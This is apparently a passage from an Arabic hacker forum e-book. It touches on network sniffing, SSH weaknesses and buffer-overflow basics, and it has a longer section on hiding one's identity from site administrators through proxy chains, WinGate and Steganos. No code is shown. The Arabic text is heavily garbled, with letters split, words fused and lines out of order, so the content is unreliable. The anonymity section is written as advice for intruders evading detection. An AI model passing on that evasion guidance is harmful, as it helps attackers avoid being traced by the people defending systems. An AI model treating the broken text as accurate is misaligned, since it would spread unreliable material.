ﺘﻘﺪاﻧﻜﻢ ﻣﻌﯿﻨﻪ و ﻫﺬا ﻣﺎ ﯾﺴﻤﻰﺑﺄناﻟﺸﺨ ﺺﻟﺪﯾﻪ unauthorized access to systemsﺎﻋ
ﺘﻘﻂﻛ ﻞاﻟﺒﺎﻛﯿﺪﺟ ﺲ ﻣﻦ ﺧﻼ ل ﻗﺐ اﻟﻨ ﺖ وركﺗ ﺮاﻓﯿﻚ و ﯾﻠ ﺘﻮﻧﻰاﻻن ﻮ ﯾﻤﻜﻦاﯾ ﻀﺎ ﻻى ﺷﺨ ﺺان ﯾ ﺮا ﻓﻬﻤ
ﺘﻚ. ﺘﻢﻟ ﺸﺒﻜ ﺘﻮى ﻋﻠﻰاﻟﺒﺎﺳﻮردسﻟﻠﺴﯿﺴ ﺘﻚ وﺗﻜﻮن ﻫﺬهاﻟﺒﺎﻛﯿﺪﺟ ﺲﺗ ﺤ ﺷﺒﻜ
ﺘ ﺮا قاﻟﻤﻨﻈﻤﺎ ت ﺘﺨﺪمﻓﻰا ﺧ ﺘ ﺮا ق وﺗﺴ ﻗﺒﻪاﻟﻨ ﺖ وركﺗ ﺮاﻓﯿﻚﻫﻰ ﻃ ﺮﯾﻘﻪ ﺣﻘﯿﻘﯿﻪﻓﻰاﻻ ﺧ ﻣﻠ ﺤﻮﻇﻪ :ﻃ ﺮﯾﻘﻪ ﻣ ﺮا
ﺘ ﺮا ق ( .
ﺛ ﺮ واﻻﻋﺪادﻟﻼ ﺧ ﺎﻟﻜﺒ ﺮى وﺗﻘﻊﺗ ﺤ ﺖﺑﻨﺪﺗﻘﻔﻰاﻻ
ﻮاﻻن ﻧﻌﻮداﻟﻰاﻟﺴﯿﻜﯿﻮر ﺷﯿ ﻞ و ﻣﺰاﯾﺎاﻟﺴﯿﻜﯿﻮر ﺷﯿ ﻞﺗﻈﻬ ﺮ ﻫﻨﺎ ﻣﻊﻛ ﻞ ﻋﯿﻮباﻻدوا تﻓﻰ ﯾﻮﻧﻜ ﺲ
ﺛﻮ ق ﻋﺒ ﺮهاى ﻻ ﯾﻌﻄﯿﻪ ﺘﺼ ﻞاﺗﺼﺎ ل ﻣﻮ ﻓﺎﻟﺴﯿﻜﯿﻮر ﺷﯿ ﻞ ﯾﻄﺎﻟﺐاﻟﺸﺨ ﺺاﻟﺬىﻟﺪﯾﻪاﻟ ﺮو تاﻛﺴ ﺲاﯾ ﻀﺎﺑﺄن ﯾ
ﺘ ﺤﺎﯾ ﻞ ﻋﻠﻰا ل sshﻓﻰﻫﺬهاﻟﻨﻘﻄﻪ و اﻟ ﺤ ﻖﻟﻠﺪ ﺧﻮ لاﻟﻰﺑﯿﺎﻧﺎ تاﺟﻬﺰهاﻟﺸﺒﻜﻪاﻻﺑﺎﻟﺒﺎﺳﻮرد و ﻻ ﯾﻤﻜﻦاﻟ
ﺘﻄﺴﻊاﻻ ﻃﻼ ع ﻋﻠﻰﺑﯿﺎﻧﺎ تاﻟﺸﺒﻜﻪ ﺎﻻ ﺐ ﺘﺴﺎباﻟ ﺮو تاﻛﺴ ﺲﻟﻦ ﯾﺴ ﺘﻰﻟﻮﺗﻤﻜﻦاﻟﺸﺨ ﺺ ﻣﻦاﻛ ﺑﺬﻟﻚ ﺣ
authorized access to systems .
ﺘﻘﺎط ﺘﻚ واﻟ ﻗﺒﻪاﻟﻨ ﺖ ورركﺗ ﺮاﻓﯿﻚﻟﺸﺒﻜ ﻗﻚ ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣ ﺮا ﺘ ﺮا
ﻮاﻟﻨﻘﻄﻪاﻟﺜﺎﻧﯿﻪﻫﻰاناذا ﺣﺎو لا ﺣﺪ ﺎ ﺧ
ﺘﻰﺗ ﺤﻤ ﻞ ﻣﻌﻠﻮﻣﺎﺗﻚ وﺑﺎﺳﻮرداﺗﻚﻓﺴﯿﺨﯿﺐاﻣﻠﻪ ﻻناﻟﺴﯿﻜﯿﻮر ﺷﯿ ﻞ ﻻ ﯾ ﺮﺳ ﻞاﻟﺒﺎﺳﻮردا تﻓﻰ اﻟﺒﺎﻛﯿﺪﺟ ﺲاﻟ
ﺘﺮ ق ﺻﻮره وا ﺿ ﺤﻪﻛﻤﺎﺗ ﺮﺳﻠﻬﺎادوا ت ﯾﻮﻧﻜ ﺲاﻻ ﺧ ﺮى وﻟﻜﻦ ﯾ ﺮﺳﻠﻬﺎ ﻣﺸﻔ ﺮه وﻟﺬﻟﻚ ﺳﯿﻜﻮن ﻋﻠﻰاﻟﻤﺨ
٣٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻣ ﺤﺎوﻟﻪﻓﻚاﻟﺸﻔ ﺮه واﻟ ﺦ
ﺘﺒ ﺮﺛﻐ ﺮاﺗﻪﻗﻠﯿﻠﺔ وﺗﻘ ﺮﯾﺒﺎ
ﻮﻟﻜﻦ ﻣﻊﻛ ﻞ ﻫﺬهاﻟﻤﺰاﯾﺎﻟﻢ ﯾﺨﻠﻰا ل secure shellﻣﻦاﻟﺜﻐ ﺮا ت وﻟﻜﻦﺗﻌ
ﺘ ﺮ قاﻟﺴﯿﻜﯿﻮر ﺷ ﻞﻓﻘﻂﺑﻬﺎ )ﻫﺬاﻛﻼمﺑﯿﻨﻰ وﺑﯿﻨﻜﻢ ﺘﺎجاﻟﻰاﻟ ﺮوو تاﻛﺴ ﺲ واﻻ ﺧ ﺮى ﯾﻤﻜﻦانﺗﺨ ﻣﻌﻈﻤﻬﺎ ﯾ ﺤ
(
٣٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$
ﺎﻟﻜﺎﺗﺐLamer :
$$$$$$$$$$
-٢ﺎﻟﻤﻌﺎﻟﺠﻪ)(Proccess
ـBuffer Overflow
ﺘﻐﻼ ل ﻣﺎذﻛ ﺮﻓﻲ ﺎﻟ
-٤اﺳ
ﺘﻄﯿﻊ
ﻗﻮﺗﻬﺎﻟﯿﺴ
ﺘﻌﻠﻢﻛ ﻞ ﻣﻬﻢﻓﻲاﻟﺒ ﺮاﻣ ﺞ وادارةاﻟﺬاﻛ ﺮة وﻣﻮا ﻃﻦ ﺿﻌﻔﻬﺎ و
ﺘ ﺮ قان ﯾ*ﯾﺠﺐ ﻋﻠﻰﻛ ﻞ ﻣﺨ
ﺘ ﺤﺎﯾ ﻞ ﻋﻠﯿﻬﺎ وﻣﻦﻫﺬااﻟﻤﻨﻄﺒ ﻖﻛﺎن ﻫﺬااﻟﻤﻘﺎ ل .....
ﺘﻌﺎﻣ ﻞ ﻣﻌﻬﺎ واﻟ
اﻟ
ّ ﻫﺬااﻟﺨﻄﺄ؟؟؟
ﺘﻐ ﻞﺎذنﻛﯿ ﻒأﺳ
ﺘﻌﻠ ﻖﺑﻬﺬااﻻﻣ ﺮﻓﻲﺑﻨﯿﺔاﻟ ﺤﺎﺳﺰب.ﻗﺒ ﻞأنﺗﺼ ﻞ ﻻﺟﺎﺑﺔﻋﻠﻰ ﻫﺬااﻟﺴﺆا ل ﺳﻨﺄ ﺧﺬ ﺟﻮﻟﺔ ﺣﻮ ل ﻣﺎ ﯾ
ﻗﻲ ﺎﻷﻧﻈﻤﺔ.
ﺛ ﻞﻟﺒﺎ
ﻗ ﺶ ﻧﻈﺎمﻟﯿﻨﻜ ﺲ linux،ﻟﻜﻦاﻟﻤﻔﻬﻮم ﻣﻤﺎ ﻓﻲ ﻫﺬهاﻟﻤﻘﺎﻟﺔ ﺳﻨﻨﺎ
-٢اﻟﻤﻌﺎﻟﺠﻪ(Proccess):
---------------------------
٣٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
وﻫﺬهاﻟﺬاﻛ ﺮةﺗﻔﯿﺪ ﻋﻨﺪﻣﺎ ﯾﻜﻮنﻟﺪﯾﻨﺎ ﻋﺪدﻛﺒﯿ ﺮ ﻣﻦاﻟﻤﻬﺎم ﻣﻮﺟﻪاﻟﻰاﻟﺬاﻛ ﺮةاﻟ ﺤﻘﯿﻘﺔاﻟ ﺮام ...وﻓﻲ ﻧﻔ ﺲ
ﻗ ﺖﻓﺎﻟﺬاﻛ ﺮةاﻟ ﺤﻘﯿﻘﺔأ ﺻﻐ ﺮ ﻣﻦﻛﻤﯿﺔاﻟﻤﻬﺎماﻟﻤﻮﺟﻬﻪﻟﻠﺬاﻛ ﺮةاﻟ ﺤﻘﯿﻘﺔ ... اﻟﻮ
ﺘ ﺮا ﺿﯿﺔ ﺣﯿﺚﺗﻘﻮمﺑﺨﺰناﻟﺒﯿﺎﻧﺎ تاواﻟﻤﻬﺎمﻓﻲ ﻣﻜﺎن ﻣﺎ ﻋﻠﻰاﻟﻬﺎردﯾﺴﻚﻓﻲ ﻫﻨﺎ ﯾﺄﺗﻲ دوراﻟﺬاﻛ ﺮةاﻻﻓ
ﺘﻢ
ﻣﻨﻄﻘﺔ ﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎا ل SWAPاو Back storeوﺗﻌﺎﻣ ﻞ ﻫﺬهاﻟﺒﯿﺎﻧﺎ ت وﻛﺄﻧﻬﺎﻓﻲاﻟﺬاﻛ ﺮةﺗﻤﺎﻣﺎ وﯾ
ﺘ ﺮا ﺿﯿﺔ ﻣﻦ ﺧﻼ ل ﻋﻤﻠﯿﺔ ﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎ swapping ﻋﻤﻠﯿﺔ ﻧﻘﻠﻬﺎ ﻣﻦ واﻟﻰاﻟﺬاﻛ ﺮةﺑﺎدارة ﻫﺬهاﻟﺬاﻛ ﺮةاﻻﻓ
ﺘﻲ ﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎ )ﺘ ﺮا ﺿﯿﺔاﻣﺎاﻟﺬاﻛ ﺮةاﻟ ﺤﻘﯿﻘﺔﻓﻬﻲ ﻣﻌ ﺮوﻓﺔﻟﺪىاﻟﺠﻤﯿﻊ واﻟ وﻫﺬا ﻣﻠﺨ ﺺ ﻋﻦاﻟﺬاﻛ ﺮةاﻻﻓ
READ ONLY MEMORY (RAMاواﻟﺬاﻛ ﺮةاﻟﻔﯿﺰﯾﺎﺋﯿﺔ ...
------
٣٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٣٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$
ـﻮ ل
ـ
ــ
ــ
ـ
ــﻘ
ـ
ــ
ــﻨ
ـ
ــ
ﻣ
$$$$$$$$$$$
ﺘ ﺮﻧ ﺖ :
ﺘﻬﺎﺑﺎﻻﻧ
ﻗـ CGIو ﻋﻼ
ﻓﻲ ﻫﺬااﻟﻤﻠ ﻒ ﺳﻮ ف ﻧﻘﻮمﺑﻌ ﺮ ض ﻣﻘﺪﻣﺔاﻟ
ـ CGI) (١ﻣﻘﺪﻣﺔﻟﻠ
٣٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
اﻟﻔ ﺼ ﻞ اﻟﺜﺎﻧﻲ
<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
(())اﻟﺤﻤﺎﯾﺔواﻟﺘﺨﻔﻲ
٣٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
ـ ﺮ & hi_haCker
ـ
ـﺪ><
ـ
ـ><
ـ
ﺎﻟﻜﺎﺗﺐ & JawaDal :ﺎﻟ
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
ﻗﻊﺑﻚ) track you واﻟﻜﺜﯿ ﺮاﻟﻜﺜﯿ ﺮ!!ﻟﺬاﻟﻮأراداﻻدﻣﻦان ﯾﻠﻘﻲ ﻧﻈ ﺮه ﻋﻠﯿﻬﻢ ) (log.filesﺳﻮ ف ﯾﻮ
(down
ﺘﺨﺪمﺑ ﺮوﻛﺴﯿﯿﻦ ﻫﻨﺎﻟﻚاﻣ ﺮ ﯾﺠﺐانﺗﻌ ﺮﻓﻪ ﺘﺒﺎدراﻟﻰ ذﻫﻨﻚ وﺗﻘﻮ ل :ﻟﯿﺴ ﺖ ﻫﻨﺎﻟﻚأي ﻣﺸﺎﻛ ﻞاﻧﺎ ﺳﺎﺳ رﺑﻤﺎ ﯾ
ﻋﻦاﻟﺒ ﺮوﻛﺴﯿﺎ ت
ﻗﻊ--FTP--ﺗﻠﻨ ﺖاواي ﺷﺊا ﺧ ﺮ! ﺟﻬﺎزك <--ﺧﺎد ماﻟﺒ ﺮوﻛﺴﻲ<--اﻟﻤﻮ
ﺘﻲﺘﻄﯿﻊاﻻﯾﻘﺎ عﺑﻚ او ﺣ ﻗﻊ واﻻدﻣﻦارادان ﯾﻌ ﺮ ف ﻣﺼﺪرك وﻣﻦاﻧ ﺖ .ﻓﺒﻘﻠﯿ ﻞ ﻣﻦاﻟﻤﺎ ل ﯾﺴ ﻗ ﺖ ﻣﻮﺘﺮﻟﻮا ﺧ
ﺘﺨﺪماﻛﺜ ﺮ ﻣﻦﺑ ﺮوﻛﺴﻲ ﺘ ﺮ قاﻟﺒ ﺮوﻛﺴﻲ ﺳﯿ ﺮﻓ ﺮ و ﺳﯿﻌ ﺮ ف ﻋﻨﻚﻛ ﻞ ﺷﺊ ..ﻧﻔ ﺲاﻟﻜﻼمﻟﻮﻛﻨ ﺖﺗﺴ ﯾﺨ
ﺟﻬﺎزك <--ﺧﺎدماﻟﺒ ﺮوﻛﺴﻲاﻻو ل <--ﺧﺎدماﻟﺒ ﺮوﻛﺴﻲاﻟﺜﺎﻧﻲ<--اﻟﺜﺎﻟﺚ...--so on--
ﺘﻪاﻟﻮﺻﻮ لاﻟﯿﻚ . ﺘﻄﺎﻋﺘﻄﻠﺐ ﻣﻨﻪ ﺟﻬﺪا وﻣﺎﻻ ...ﻟﻜﻦﻓﻲاﻻ ﺧﯿ ﺮﺑﺎﺳ ﺘﻪان ﯾﺼ ﻞاﻟﯿﻚﻟﻜﻦ ذﻟﻚ ﯾ ﺘﻄﺎﻋﻓﺎنﺑﺎﺳ
٤٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻚ ﺘﺨﻔﻲ وا ﺧﻔﺎ ءﻫﻮﯾ ﺘﻔﺼﯿ ﻞﻟﺒﻌ ﺾ ﻣﻦاﻻﻣﻮراﻟﻬﺎﻣﺔ وﺳﻨﺬﻛ ﺮ ﻫﻨﺎﺑﻌ ﺾاﻟﻄ ﺮ قﻟﻠ ﺳﺄﺷ ﺮ حاﻻنﺑﺸﺊ ﻣﻦاﻟ
ﻓﻲاﻟﺸﺒﻜﺔ :
Proxy - Sock Host - Wingate
-------------------------------------------
ـ Proxy Server؟؟؟ ﻣﺎ ﻫﻮاﻟ
ﺘﻠﻔﺔ ﺳﻮا ء ﻣﻊ ) proxy serverﺧﺎدم ﺎﻟﻮﻛﯿ ﻞ(ﻫﻮ ﺧﺎدم serverﻧﻘﻮم ﻣﻦ ﺧﻼﻟﻪﺑﻌﻤﻠﯿﺎ تاﻻﺗﺼﺎ لاﻟﻤﺨ
ﺘ ﺮﻧ ﺖ ﻣﻦ ﺧﻼ ل proxy ﻗﻊاو ﻣﻊاﻻﺟﻬﺰةاﻻ ﺧ ﺮى ﻣﻦ ﺧﻼ لاﻟﺸﺎ ت وووو ..اﻟ ﺦ ﻓﻌﻨﺪاﺗﺼﺎﻟﻚﺑﺎﻹﻧ اﻟﻤﻮا
ﺘﻢاﻻﺗﺼﺎ ل ﻗﺒ ﻞﻛ ﻞ ﺷﻲ ءﺛﻢ ﯾ ﺘﺨﺪمأوﻻ و serverﻓﺈن ﺟﻤﯿﻊاﺗﺼﺎﻻﺗﻚ ﺳﻮ فﺗﺬﻫﺐإﻟﻰ ﻫﺬااﻟﺒ ﺮوﻛﺴﻲاﻟﻤﺴ
ﺘ ﺮﻧ ﺖﺘﺼ ﻞﺑﺎﻹﻧ ﻗﻊاﻟﻤﻄﻠﻮب ....ﻓﻤﺜﻼإذاأرد تأنﺗ ﺘﻜﻮناﻻﺟﺎﺑﺔﻫﻲﺗ ﺤﻤﯿ ﻞاﻟﻤﻮ ﻗﻊاﻟﻤﻄﻠﻮبﻟ ﺑﺴﯿ ﺮﻓ ﺮاﻟﻤﻮ
ﻗﻌﺎﻛﻬﺬاﺘﺢ ﻣﻮ ﺘﺼﻔﺢ وﺗﻔ ﺘﺨﺪام proxy serverوﺗ ﺮﯾﺪﺄنﺗ ﻣﻦ ﺧﻼ لاﺳ
.. http://www.3asfh.com/vb/ﻋﻠﯿﻚأوﻻﺑﺎﻟﻄﻠﺐ ﻣﻦﻫﺬا proxy serverﺛﻢ ﯾﻘﻮم proxy
ﻗﻊ وﻣﻦﺛﻢ serverﺑﻄﻠﺐاﻟﺼﻔ ﺤﺔ http://www .3asfh.com/vb/ﻣﻦ ﺧﺎدم serverﺎﻟﻤﻮ
ﺘﻌ ﺮا ض ﻫﺬهاﻟﺼﻔ ﺤﺔ ... ﺘﻄﯿﻊا ﺳ ﺗ ﺤﻤﯿﻠﻬﺎ وﺗﺨﺰﯾﻨﻬﺎﻟﺪﯾﻚﺑﻤﻌﻨﻰاﻧﻚ ﺳﻮ فﺗﺴ
ﺘﻬﻠﻚﻓﻲ ﻗ ﺖاﻟﻤﺴ ﺘﺄﻛﯿﺪأن ﻫﺬهاﻟﻌﻤﻠﯿﺔﺗﺄ ﺧﺬﻛﻤﯿﺔﻗﻠﯿﻠﺔ ناﻟﺒﯿﺎﻧﺎﺗﻤﻘﺎرﻧﺔ ﻣﻊاﻟﻮ ﺘﻼ ﺣﻆ ﻣﻦ ﺧﻼ ل ﻣﺎ ذﻛ ﺮ تﺑﺎﻟ ﺳ
ﻗ ﻞ ﻣﻘﺎرﻧﺔﺑﺎﻹﺗﺼﺎ ل ﺎﻟﻌﺎدي )ﺑﺪونﺑ ﺮوﻛﺴﻲ( ﻗ ﺖأ ﻃﻮ ل وﻛﻤﯿﺔاﻟﺒﺎﺗﺎ تاﻟﻮا ﺻﻠﺔاﻟﯿﻨﺎا ﻃﻠﺐ ﻫﺬهاﻟﺼﻔ ﺤﺔﻓﺎﻟﻮ
ﺘﻢﺗ ﺤﻤﯿﻠﻬﺎ ﻣﺒﺎﺷ ﺮةﻗﻊاﻟﻤﻄﻠﻮبﺛﻢ ﯾ ﺘﺠﻪاﻟﻄﻠﺐ ﻣﺒﺎﺷ ﺮة ﻣﻨﻚاﻟﻰ ﺳﯿ ﺮﻓ ﺮاﻟﻤﻮ ﻗ ﺖ ﻃﻠﺐاﻟﺼﻔ ﺤﺔ ﺳﯿ ﺣﯿﺚ ﻣﻦ و
ﻗ ﻞ ...اذن ﻣﻊاﺗﺼﺎﻟﻚﺑﻠﻠﺒ ﺮوﻛﺴﻲ ﺳﯿ ﺮﻓ ﺮ ﺳﻮ ف ﯾﺼﺒﺢاﺗﺼﺎﻟﻚ ﻗ ﺖاﺘﺼﻔ ﺤﻚﻓﻲ و ﺘﻌ ﺮ ﺿﻬﺎﻓﻲ ﻣ ﺑ ﺤﯿﺚﺗﺴ
ﺘﻌ ﺮ ﺿﻬﺎﺗﺬﻫﺐﺈﻟﻰ ﺘ ﺤﻤﯿﻠﻬﺎأيﺗﺴ ﺘ ﺮﻧ ﺖﺑﻄﻲ ء ﻣﻘﺎرﻧﺔ ﻣﻊاﻻﺗﺼﺎ لاﻟﻤﺒﺎﺷ ﺮ وذﻟﻚﻷنﻛ ﻞ ﺻﻔ ﺤﺔﺗﻘﻮمﺑ ﺑﺎﻹﻧ
ﺘﺼﻔﺢاﻻﻓﻲ ﺣﺎﻟﺔ ﻧﺎدرة وﻫﻮان ﯾﻜﻮن ﻫﺬااﻟﺒ ﺮوﻛﺴﻲ proxey serverﻣﻤﺎﯾﺆدياﻟﻰاﺑﻄﺎ ء ﻋﻤﻠﯿﺔاﻟ
ﺘﻔ ﻖ وانﺗٌﻄﻠﺐ ﻧﻔ ﺲاﻟﺼﻔ ﺤﺔ ﺘﻲﺗﻮﺟﺪﺑﻬﺎاﻧ ﺖ .اوان ﯾ ﺘﺨﺪمﻗ ﺮﯾﺐ ﻣﻦاﻟﻤﻨﻄﻘﺔاﻟ اﻟﺒ ﺮوﻛﺴﻲ ﺳﯿ ﺮﻓ ﺮاﻟﻤﺴ
ﻗ ﺖ ﺳﺎﺑ ﻖﻗﺒ ﻞ ﻃﻠﺒﻚﻟﻬﺬه ﺘﺨﺪﻣﺔاﻧ ﺖﻓﻲ و ﺘﻬﺎ ﻣﻦ ﺷﺨ ﺺا ﺧ ﺮﻟﻪ ﻧﻔ ﺲاﻟﺒ ﺮوﻛﺴﻲاﻟﺬيﺗﺴ ﺘﻲاﻧ ﺖ ﻃﻠﺒ اﻟ
اﻟﺼﻔ ﺤﺔ .
][User] >>>>>>>>>> [Proxy] >>>>>>>>>> [Web Page
ﺘﺨﺪماﻟﺒ ﺮوﻛﺴﻲ ﺳﯿ ﺮﻓ ﺮ؟ ﻟﻤﺎذا ﻧﺴ
ﺘﻲﺗﻘﻮمﺑﻬﺎ ﻋﻠﻰ ﻫﺬه ﺘﻚ واﻟﺒﻘﺎ ء ﻣﺠﻬﻮﻻﻓﻚ ﻋﻤﻠﯿﺎﺗﻚاﻟ ﻟﻌﺪةاﺳﺒﺎب :اﻟﺴﺒﺐاﻟ ﺮﺋﯿﺴﻲﻫﻮﻟﻠ ﺤﻔﺎظ ﻋﻠﻰ ﻫﻮﯾ
ﺘﻰﻟﻮﺗﻢا ﺻﻄﯿﺎدكﻓﺎﻧﻨﻬﻢ ﺳﯿ ﺤﺼﻠﻮن ﻋﻠﻰ ﻗﺒﺔ ﻣﻦاﻷﻋﯿﻦﻓﻲﻛ ﻞ ﻣﻜﺎنﺑ ﺤﯿﺚاﻧﻪ ﺣ اﻟﺸﺒﻜﺔاﻟﻤﻜﺸﻮﻓﺔ واﻟﻤ ﺮا
ﻗﻊاﻟﻤﻄﻠﻮبﻛﻤﺎ ﺘﺨﺪمﻓﻲ ﻋﻤﻠﯿﺔاﻻﺗﺼﺎ لﻻﻧﻪﻫﻮاﻟﺬي ﯾﻘﻮمﺑﻌﻤﻠﯿﺔاﻻﺗﺼﺎ لﺑﺴﯿ ﺮﻓ ﺮاﻟﻤﻮ ipاﻟﺒ ﺮوﻛﺴﻲاﻟﻤﺴ
ﻗﻮ لﺑﺄﻧﻪ ﻻ ﯾﻤﻜﻦاﻟﻮﺻﻮ لاﻟﯿﻚ ... ﻗﻊاﻟﻤﻄﻠﻮب .واﻧﺎ ﻻأ ﺘﺨﺪم وﺳﯿ ﺮﻓ ﺮاﻟﻤﻮ ذﻛ ﺮﻧﺎﻓﻬﻮاﻟﻮﺳﯿﻂﺑﯿﻦاﻟﻤﺴ
٤١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺨﺪاﻣﻚﻟﻌﺪداﻛﺒ ﺮ ﻣﻦ ﺘﻬﺎ ﻫﻮاﺳ ﯾﻤﻜﻦ وﻟﻜﻦﺑﺼﻌﻮﺑﺔﺑﺎﻟﻐﺔ وﻋﻤﻠﯿﺎ تﺗﻘﻔﻲ ﻃﻮﯾﻠﺔ وﻣﻤﺎ ﯾﺰﯾﺪ ﻣﻦ ﺻﻌﻮﺑ
اﻟﺒ ﺮوﻛﺴﯿﺎ ت
ﻗﻊاﻟﻤﻬﻤﺔﻓﻔﻲﻛﺜﯿ ﺮ ﻣﻦاﻟﺪو ل ﺳﺒﺐا ﺧ ﺮاناﻏﻠﺐ ﻣﺰودياﻟﺨﺪﻣﺔ ISPﯾﻘﻮﻣﻮنﺑ ﺤﺠﺐاﻟﻜﺜﯿ ﺮ ﻣﻦاﻟﻤﻮا
ﻗﻊﻗﻊاﻟﻬﻜ ﺮ ﺑﻨﺴﺒﺔ %٤٠ﻣﻐﻠﻘﺔاواﻛﺜ ﺮ واﻧﺎاﺗﻜﻠﻢ ﻋﻠﻰاﻟﻤﻮا ﻛﺎﻟﺴﻌﻮدﯾﺔ واﻻﻣﺎرا ت وﻏﯿ ﺮﻫﺎ ﻧﺠﺪان ﻣﻮا
ﻗﻊ
اﻻﺟﻨﺒﯿﺔ وﻟﯿﺴ ﺖاﻟﻌ ﺮﺑﯿﺔاﻟﻰ ﻏﯿ ﺮ ذﻟﻚ ...ﻓﻬﻨﺎﺗ ﻀﻄ ﺮاﻟﻰاﻟﻠﺠﻮ ءاﻟﻰاﻟﺒ ﺮوﻛﺴﯿﺎ تﻟﻠﻮﺻﻮ لاﻟﻰﻫﺬهاﻟﻤﻮا
ﺘﻲاﻧ ﺖﺑﻬﺎﻛﺎنادا ء ﻧﻘﻄﺔﻫﺎﻣﺔ :ﺿﻌﻬﺎﻓﻲ ﺣﺴﺒﺎﻧﻚ وﻫﻲﻛﻠﻤﺎﻛﺎناﻟﺒ ﺮوﻛﺴﻲﻗ ﺮﯾﺒﺎ ﻣﻦاﻟﻤﻨﻄﻘﺔاﻟ
اﻟﺒ ﺮوﻛﺴﻲاﺳ ﺮ ع .
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ﻣﺎﻫﻮ WinGate؟
ﺘﻮي ﻋﻠﻰ ﻫﻮ proxy server firewallﺄي ﯾﻔﻮ قاﻟﺒ ﺮوﻛﺴﻲ ﻮﻫﻮ ﺧﺎدمﺑ ﺮوﻛﺴﻲ ذو ﺣﺎﺟﺰ ﻧﺎري ﯾ ﺤ
ﺘﻲﺗﺒﻘﯿﻚ( Anonymouslyﻣﺠﻬﻮ لاﻟﻬﻮﯾﺔ( ﺘﺼﺔﺑﺎﻟ ﺤﻤﺎﯾﺔ واﻟ ﺣﺰﻣﺔﻛﺒﯿ ﺮة و ﺿﺨﻤﺔ ﻣﻦاﻟﺒ ﺮاﻣ ﺞاﻟﻤﺨ
wingate
ﺘﺸﺎﺑﻪ ﻣﻊاﻟﺒ ﺮوﻛﺴﻲ ﺳﯿ ﺮﻓ ﺮ ﺣﯿﺚ ﯾﻌﻤ ﻞاﺗﺼﺎﻻ ت ﻣﻊﻛﻮﻣﺒﯿﻮﺗ ﺮﻟﺴﯿ ﺮﻓ ﺮ آ ﺧ ﺮ ﺧﻼ لاﻟﻤﻨﻔﺬ 23 ,ﻓﻲاﻟ ﺤﻘﯿﻘﺔ ﻣ
ﻫﻮاﺗﺼﺎ لTelnet .
ﻛﯿﻔﯿﺔاﻟ ﺤﺼﻮ ل ﻋﻠﻰ WinGate؟
ﻗﺎﺋﻚإذاﻛﺎنﻟﺪىا ﺣﺪ ﻣﻨﻬﻢ . ﺑﺈﻣﻜﺎﻧﻚﺗﺎ ﺧﺬ ﻋﻨﻮان wingateﻣﻦأ ﺻﺪ
ﺘﺼﺔﺑﺬﻟﻚ ﻣﺜ ﻞ WinGate Scannerﺣﯿﺚ ﯾﺠﺐ ﻋﻠﯿﻚ ﺘﻄﯿﻊﻓﻌ ﻞ ذﻟﻚ ﻣﻦ ﺧﻼ لﺑ ﺮاﻣ ﺞﺑ ﺤﺚ ﻣﺨ اﯾ ﻀﺎﺗﺴ
ﻗﻲﻟﻠﺒ ﺮﻧﺎﻣ ﺞﻟﯿﻘﻮمﺑﻤﻬﺎﻣﻪ وﻟﻠﻤﺰﯾﺪ ﺣﻮ ل ﻫﺬااﻟﻤﻮ ﺿﻮ عأﻧﺼ ﺤﻜﻢ ﻓﻘﻂﺗ ﺤﺪﯾﺪا ل IPواﻟﻬﻮﺳ ﺖ ﻧﯿﻢ واﺗ ﺮكاﻟﺒﺎ
ﺘﺨﺪم ﻫﺬهاﻟﻄ ﺮﯾﻘﺔ ﻣﻦ ﺑﺎﻟﺒ ﺤﺚ ﻣﻦ ﺧﻼ ل ﺧﺎدماﻟﻬﻜ ﺮز )ﺟﻮﺟ ﻞ (ﻷن ﺧﺒﺮﺗﻲﻓﻲﻫﺬااﻟﻤﺠﺎ لﻗﻠﯿﻠﺔ وﻻﻧﻲﻟﻢاﺳ
ﻗﺒ ﻞ
٤٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٤٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐMaXhAk2000:
$$$$$$$$$$$$$$$$
ﺘﻨﻜ ﺮهﻓﻼﯾﻤﻜﻨﻚﻷ ﺣﺪأن ﯾﻜﺸ ﻒﺘ ﺮﻧ ﺖﺑﻬﻮﯾﻪ ﻣﺠﻬﻮﻟﻪ وﺷﺨﺼﯿﻪ ﻣ ﺘﯿﺠﺎﻧﻮس ﯾﺴﻤﺢﻟﻚانﺗﺒ ﺤ ﺮﻓﻲاﻷﻧ ﺳ
ﻗﻢاﻷﯾﺒﻲاﻟ ﺤﻘﯿﻘﻲاﻟﺨﺎ صﺑﻚﻟﻜﻲ ﺘﻨﻜﯿ ﺮ وﺗﻐﯿﯿ ﺮ ر
ﺘﯿﺠﺎﻧﻮس ﯾﻘﻮمﺑ
ﺘﻚ وﯾﻌ ﺮ ف ﻣﺸﺨﺼﺎﺗﻚﻷنﺑ ﺮﻧﺎﻣ ﺞ ﺳﻫﻮﯾ
